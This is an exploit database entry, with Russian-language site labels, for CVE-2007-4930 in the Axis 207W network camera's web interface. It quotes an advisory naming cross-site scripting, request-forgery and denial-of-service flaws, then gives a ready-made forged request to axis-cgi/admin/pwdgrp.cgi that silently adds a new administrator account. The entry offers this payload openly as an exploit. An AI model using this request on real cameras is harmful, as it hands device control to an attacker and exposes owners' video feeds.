Exploit Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities

[Exploiter]

EDB-ID

30586

Проверка EDB

1. Пройдено

Автор

SETH FOGIE

Тип уязвимости

WEBAPPS

Платформа

CGI

CVE

cve-2007-4930

Дата публикации

2007-09-14

source: https://www.securityfocus.com/bid/25678/info
 
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
 
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
 
Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1